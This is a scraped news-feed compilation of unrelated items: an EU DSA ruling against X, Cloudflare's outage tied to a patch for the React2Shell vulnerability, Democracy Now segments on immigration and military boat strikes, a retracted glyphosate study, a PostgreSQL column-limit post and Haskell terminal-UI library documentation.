The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.
"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."
X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.
"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.
"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."
The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
[$] Eventual Rust in CPython
Linux Weekly News
lwn.net
2025-12-05 14:33:09
Emma Smith and Kirill Podoprigora, two of Python's core developers, have
opened a
discussion about including Rust code in CPython, the reference implementation of
the Python programming language. Initially, Rust would only be used for optional
extension modules, but they would like to see Rust beco...
The page you have tried to view (
Eventual Rust in CPython
) is currently available to LWN
subscribers only.
Reader subscriptions are a necessary way
to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in
with the form below to read this content.
Please consider
subscribing to LWN
. An LWN
subscription provides numerous benefits, including access to restricted
content and the warm feeling of knowing that you are helping to keep LWN
alive.
(Alternatively, this item will become freely
available on December 18, 2025)
It'll Be Left Vs. Left for Nydia Velázquez's Open Seat
The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen
here
, or wherever you get your podcasts
In
congressional
districts
around the city
, primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.
The district lies at the heart of the "
Commie Corridor
," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez
announced last month
that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.
Brooklyn Borough President Antonio Reynoso
kicked off his campaign
for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.
"The fight must continue. And I'm ready to step up," Reynoso said in a
launch video
, filmed mostly in Spanish on the south side of Williamsburg where he grew up.
Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.
Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.
Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.
By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.
Before Emerge, our founders
Zo
and
Gabe
co-founded Ameelio,
an award-winning tech nonprofit
that is dismantling the prison communication duopoly.
Backed by tech luminaries
like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.
Our students are at the heart of our work. Their journeys have captured national attention on
CBS
,
NBC
, and in
The Boston Globe
, and our programs now serve entire
states
and
cities
. And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776), Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.
We call this a
Founding Design Engineer
role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.
This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.
This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.
Who You Are:
You love supporting other people’s growth.
This role will feel like case work at times, and you’re drawn to that. You’ve dedicated your life volunteering, working in social impact, or finding ways to make the playing field more fair. You find joy in helping others rise. You don’t hesitate to call, text, or meet with a student who needs you. You show up consistently, personally, and with heart.
You believe everyone deserves a second chance.
You treat everyone with dignity. You know how to meet people exactly where they are—with empathy and compassion—helping create a space where everyone feels seen and valued, regardless of their background..
You identify yourself as a cracked engineer.
You love finding a way or making one. You take extreme ownership of ideas, driving them to completion even when others need convincing. Every time you hit a wall, you think of three new ways to solve the issue.
You are tech-forward, but not tech-first.
You look for ways to automate and scale, but you know not everything should be automated. You believe that with the right builder mindset, one coach can support hundreds of individuals—but you also understand that in a program like ours, many moments require a human touch. You know when to hand it to a system, and when to pick up the phone.
You are entrepreneurial.
You’re scrappy, resourceful, autonomous, and low-maintenance. You know process matters—but at this stage, speed and iteration matter more. You’re comfortable building quickly and changing procedures often to get to the right solution. You roll up your sleeves and solve problems. No job is too small.
You play to win.
You stay optimistic when things get tough and keep moving when others slow down. You’re not rattled by change or new ideas. You don’t need to agree with everything, but you bring a “yes, and” mindset that helps ideas grow instead of shutting them down.
You work hard
. You show up early, stay late, and do what needs to get done—no ego, no excuses. You don’t wait around or ask for permission. This isn’t a 9-to-5. The team puts in 10+ hour days because we care about the mission and each other. If that sounds miserable, this isn’t for you. If it sounds exciting, you’ll fit right in.
You are a straight shooter.
You don’t shy away from hard conversations—internally or externally. You bring clarity, care, and accountability to every interaction.
You love learning.
You understand that recent advancements in AI have shifted the way we work and what it means to be a high performer. You tinker with new tools. You enjoy being an early adopter. You’re always rethinking and optimizing how you work so you can keep leveling up. Nobody needs to tell you to keep upping your game.
You have an eye for operational detail.
This doesn’t mean you’re simply organized. At Emerge, operational excellence isn’t just about efficiency—it’s about protecting the real lives and futures of the people in our programs. You have an almost paranoid attention to detail, because you understand that even small oversights have real, human consequences.
You are a clear writer.
This doesn’t mean you need to craft the next great novel, but you must communicate ideas simply and clearly. You value precision, clarity, and brevity. You understand that good writing reduces confusion, accelerates decisions, and ensures everyone stays aligned, especially in high-stakes environments like ours.
You are a strong prompter.
You’ve seen firsthand how a few thoughtful prompts can transform messy tasks into scalable, repeatable AI workflows. You love tinkering with prompts, contexts, and configurations to get exactly the right outputs, and you take pride in turning cutting-edge AI into practical processes that anyone can use.
Requirements
Willing to relocate and work in-person in New York City
Experience taking a project from 0 to 1. You might have led a project, been a founder previously, built an impressive side project, or been one of the first 10 employees at an early stage startup
You love working with React and Typescript
Experience with Figma
Experience collaborating with operations or support teams
Bonus Points
Experience in ed-tech
Experience with UX research
What you will be doing
Coaching students.
You’ll support students throughout their training journey—not just by building tools, but by directly engaging with them. This means texting, calling, and helping students one-on-one when needed. At the same time, you’ll take what you learn from those interactions and turn it into scalable systems and smart automations. You’ll be doing both engineering and non-engineering work to make sure students succeed and the product keeps improving.
Talking to students.
Good founding engineers read feedback and iterate quickly. Great founding engineers have users they're friendly with, talk with them frequently, bounce ideas off them, and iterate with them when they ship new things.
Doing support
. This is an engineering role with key program management responsibilities. You’ll work directly with students every day. That requires patience, empathy, and a willingness to meet people where they are. You’ll help investigate and resolve product issues, and you’ll take ownership of making the product better through what you learn.
Documenting your work and its impact.
Our work is complex, spans months, and involves multiple teams. Clear documentation and communication are critical. You’ll be responsible for creating awareness when a change impacts operations, and for helping others understand how features affect different parts of training and service delivery. Precision matters.
Owning products and features end to end
. You won’t just take tickets. You’ll originate ideas based on user conversations, your own instincts, and our larger strategy. You’ll test MVPs in production, iterate based on real feedback, and stay accountable to the long-term success of your work. We build in React and TypeScript. If you like shipping for the sake of it, this role isn’t for you. If you like shipping with purpose and ownership, you’ll love it here.
Implementing AI features and operational workflows
. This is last for a reason. We don’t jump to automation. We do things manually first to fully understand the problem—then we build. If you care about applying AI meaningfully, not just for hype, this is the right place.
Cultural fit
conversation & technical screen
(60 min)
Getting to know you interview (60 min):
A more in-depth discussion about your background, experiences, and goals.
Reference checks.
We will select 3–4 people you’ve worked with and request introductions. We will request these when the time comes. We’re looking for honest and raw references, not flawless ones.
Paid Work Trial (2-5 days).
You’ll come onsite to work on a real project, with access to internal tools and team collaboration. You’ll be paid $500 per day. All travel expenses will be covered.
About
Emerge Career
Founded:
2022
Batch:
S22
Team Size:
3
Status:
Active
Founders
Cloudflare blames today's outage on emergency React2Shell patch
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:53:26
Cloudflare has blamed today's outage on the emergency patching of a critical React remote code execution vulnerability, which is now actively exploited in attacks. [...]...
In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.
"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning,"
Cloudflare said
.
"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."
Tracked as
CVE-2025-55182
, this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.
The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.
While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.
Ongoing React2Shell exploitation
Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda)
have begun exploiting the React2Shell vulnerability
hours after the max-severity flaw was disclosed.
Last month, Cloudflare experienced
another worldwide outage
that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."
Cloudflare
fixed another massive outage
in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
"Alejandro Was Murdered": Colombian Fisherman's Family Files Claim Against U.S. over Boat Strike
Democracy Now!
www.democracynow.org
2025-12-05 13:51:34
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identit...
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.
“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”
Please check back later for full transcript.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Influential study on glyphosate safety retracted 25 years after publication
A 2000 study that concluded the well-known herbicide glyphosate was safe, widely cited since then, has just been officially disavowed by the journal that published it. The scientists are suspected of having signed a text actually prepared by Monsanto.
A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal
Regulatory Toxicology and Pharmacology
announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.
Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.
You have 73.89% of this article left to read. The rest is for subscribers only.
Vous pouvez lire
Le Monde
sur un seul appareil à la fois
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire
Le Monde
avec ce compte sur un autre appareil.
Vous ne pouvez lire
Le Monde
que sur
un seul appareil
à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous utilisez ce compte à plusieurs,
créez un compte pour votre proche
(inclus dans votre abonnement). Puis connectez-vous chacun avec vos identifiants.
Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter
Le Monde
avec ce compte.
Vous ignorez qui d’autre utilise ces identifiants ?
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire
Le Monde
avec ce compte sur un autre appareil.
Vous ne pouvez lire
Le Monde
que sur
un seul appareil
à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants.
Si vous êtes 3 ou plus à utiliser l’abonnement,
passez à l’offre Famille
.
Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter
Le Monde
avec ce compte.
Vous ignorez qui d’autre utilise ces identifiants ?
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire
Le Monde
avec ce compte sur un autre appareil.
Vous ne pouvez lire
Le Monde
que sur
un seul appareil
à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants.
Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter
Le Monde
avec ce compte.
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire
Le Monde
avec ce compte sur un autre appareil.
Vous ne pouvez lire
Le Monde
que sur
un seul appareil
à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous utilisez ce compte à plusieurs,
passez à une offre multicomptes
pour faire profiter vos proches de votre abonnement avec leur propre compte.
Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.
Votre abonnement n’autorise pas la lecture de cet article
Pour plus d’informations, merci de contacter notre service commercial.
Trump Calls Somali Community "Garbage": Minnesota Responds to Racist Rant and Immigration Sweeps
Democracy Now!
www.democracynow.org
2025-12-05 13:35:00
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week...
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.
“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of
CAIR
-Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”
Guests
Please check back later for full transcript.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
The 1600 columns limit in PostgreSQL - how many columns fit into a table
Quick recap: in
OLTP
, the aim is (usually) to use the
3rd normal form
. In
OLAP
, tables are often only vaguely normalized, and wide or very wide fact tables in
2nd normal form
are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.
But is that possible?
Why is there a limit
In
PostgreSQL
, a single row must fit into a single page on disk. The disk page size, by default, is
8 kB
. As
Frédéric
shows in tests in his blog posting, sometimes even a smaller number of columns does not fit into the page.
Now my analytics background is not only with
PostgreSQL
. but also with
WarehousePG
(a
Greenplum
fork) and with
Greenplum
itself. In
WarehousePG
the default page size is
32 kB
. Will this increase the number of columns? Unfortunately not:
The fork is still using the same values for
MaxTupleAttributeNumber
and
MaxHeapAttributeNumber
, limited to
1600
columns. There’s also a comment near
MaxHeapAttributeNumber
in
src/include/access/htup_details.h
:
1
2
3
* In any case, depending on column data types you will likely be running
* into the disk-block-based limit on overall tuple size if you have more
* than a thousand or so columns. TOAST won't help.
Is it possible to increase the limit
It is possible to increase these limits, and create tables with a couple thousand columns. Theoretically, a single page fits
8136
single byte columns (like a
BOOLEAN
) in
PostgreSQL
. In
WarehousePG
this even fits
32712
single byte columns. But that is not the real limit.
The
HeapTupleHeader
has the
t_infomask2
field, which is a
uint16
(unsigned integer), defined in
access/htup_details.h
. Out of the available bits, 11 are used for the number of attributes:
1
#define HEAP_NATTS_MASK 0x07FF /* 11 bits for number of attributes */
And 11 bits is
2047
attributes. Any tuple can have a maximum of
2047
attributes, even with all the
1600
safeguards increased or removed. In practice, it’s
2041
attributes. When inserting/updating a table, the database will not write more than those
2041
columns, all other columns are not set. If the column definition of the higher columns is
NOT NULL
, the
INSERT
or
UPDATE
fails with a constraint violation. Otherwise the higher columns ares simply set to
NULL
.
Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.
Conclusion
In theory it is possible to raise the
1600
columns limit to a slightly larger number. In practice it is not worth the small gain, and is pushing internal safety boundaries built into the database.
Also in practice this will have all type of mostly unintended side effects and problems. This is untested territory, all unit tests must be updated as well. Tools like
psql
have a built-in limitation as well, which also must be raised. This in turn requires always using the patched binary, it might no longer be possible to use a “standard”
psql
against this database. Other tools might have problems as well with very wide tables.
Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.
tl;dr: Don’t do this.
Thank you
Thanks to
Robert Haas
for reviewing the code assumptions about larger number of columns.
Comments
With an account on the Fediverse or Mastodon, you can respond to this
post
. Known replies are displayed below:
┌─────────┬─────┬─────────┐
│ Name │ Age │ City │
├─────────┼─────┼─────────┤
│ Alice │ 30 │ New York│
│ Bob │ 25 │ │
│ Charlie │ 35 │ London │
└─────────┴─────┴─────────┘
Unordered Lists:
ul
Clean unordered lists with automatic nesting:
ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C
Nested lists with auto-styling:
ul [ "Backend"
, ul ["API", "Database"]
, "Frontend"
, ul ["Components", ul ["Header", ul ["Footer"]]]
]
Increment the frame number on each render to animate:
-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }
-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots
-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }
layout[
withColor ColorRed $ text "The quick brown fox...",
withColor ColorBrightCyan $ text "The quick brown fox...",
underlineColored "~" ColorRed $ text "The quick brown fox...",
margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]
let palette = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
rainbow = tightRow $ map colorBlock [0, 4..255]
where
colorBlock i =
let r = if i < 128 then i * 2 else 255
g = if i < 128 then 255 else (255 - i) * 2
b = if i > 128 then (i - 128) * 2 else 0
in withColor (ColorTrue r g b) $ text "█"
putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]
Styles (ANSI Support)
Add ANSI styles to any element:
layout[
withStyle StyleBold $ text "The quick brown fox...",
withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]
layout[
withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]
You can also combine colors and styles:
withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."
Custom Components
Create your own components by implementing the
Element
typeclass
data Square = Square Int
instance Element Square where
renderElement (Square size)
| size < 2 = ""
| otherwise = intercalate "\n" (top : middle ++ [bottom])
where
w = size * 2 - 2
top = "┌" ++ replicate w '─' ++ "┐"
middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
bottom = "└" ++ replicate w '─' ++ "┘"
-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)
-- Use it like any other element
putStrLn $ render $ row
[ square 3
, square 5
, square 7
]
Command thread
- Executes
Cmd
side effects async, feeds results back
As per the above, commands run without blocking the UI.
Press
ESC
to exit.
LayoutzApp state msg
data LayoutzApp state msg = LayoutzApp
{ appInit :: (state, Cmd msg) -- Initial state + startup command
, appUpdate :: msg -> state -> (state, Cmd msg) -- Pure state transitions
, appSubscriptions :: state -> Sub msg -- Event sources
, appView :: state -> L -- Render to UI
}
Subscriptions
Subscription
Description
onKeyPress (Key -> Maybe msg)
Keyboard input
onTick msg
Periodic ticks (~100ms) for animations
batch [sub1, sub2, ...]
Combine subscriptions
Commands
Command
Description
None
No effect
Cmd (IO (Maybe msg))
Run IO, optionally produce message
Batch [cmd1, cmd2, ...]
Multiple commands
cmd :: IO () -> Cmd msg
Fire and forget
cmdMsg :: IO msg -> Cmd msg
IO that returns a message
Example: Logger with file I/O
import Layoutz
data Msg = Log | Saved
data State = State { count :: Int, status :: String }
loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
{ appInit = (State 0 "Ready", None)
, appUpdate = \msg s -> case msg of
Log -> (s { count = count s + 1 },
cmd $ appendFile "log.txt" ("Entry " <> show (count s) <> "\n"))
Saved -> (s { status = "Saved!" }, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey 'l' -> Just Log
_ -> Nothing
, appView = \s -> layout
[ section "Logger" [text $ "Entries: " <> show (count s)]
, text (status s)
, ul ["'l' to log", "ESC to quit"]
]
}
main = runApp loggerApp
5,000 Arrests? ICE Descends on Louisiana to Carry Out Raids in World's "Incarceration Capital"
Democracy Now!
www.democracynow.org
2025-12-05 13:24:43
A major immigration crackdown is underway in New Orleans and the surrounding areas of Louisiana, dubbed “Operation Catahoula Crunch” by the Trump administration. According to planning documents, 250 federal agents will aim to make 5,000 arrests over two months. Homeland Security Secretar...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
This is
Democracy Now!
, democracynow.org,
The War and Peace Report
. I’m Amy Goodman.
We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.
Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.
At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for
ICE
-free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.
MICH
GONZÁLEZ:
We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.
CHAIR
:
Not germane.
MICH
GONZÁLEZ:
Public safety is at the heart —
Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.
PROTESTERS
:
Shame! Shame!
MICH
GONZÁLEZ:
And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.
PROTESTERS
:
Shame! Shame!
MICH
GONZÁLEZ:
And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.
AMY
GOODMAN
:
For more, we’re joined by Homero López, legal director for
ISLA
, Immigrant Services and Legal Advocacy, based in New Orleans.
Welcome to
Democracy Now!
, Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?
HOMERO
LÓPEZ:
Yes. Thank you, Amy, for having me on.
We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.
AMY
GOODMAN
:
They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.
HOMERO
LÓPEZ:
Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.
And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.
What we’ve seen has been folks at work, folks at their check-ins, people around schools,
ICE
officers setting up around or
CBP
officers setting up around the schools. And the fear that’s being — the fear that’s coming into the — being sowed in the community is really the true intent of what they’re — of their operation here.
AMY
GOODMAN
:
Catahoula Crunch named after the Louisiana state dog. Didn’t Homeland Secretary Kristi Noem famously shoot her dog?
HOMERO
LÓPEZ:
That is a story that’s come out, yes.
AMY
GOODMAN
:
Many
ICE
officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?
HOMERO
LÓPEZ:
Yeah, Louisiana is playing a oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of
ICE
nationally. Our former area, New Orleans,
ICE
director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.
AMY
GOODMAN
:
Louisiana, in other parts of the country, we know it particularly here when it comes to detention. You have Mahmoud Khalil, who is the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.
HOMERO
LÓPEZ:
Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different when it comes now to immigration detention. Louisiana is number two when it comes to the second — the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is it receives a lot of people who are detained around the country.
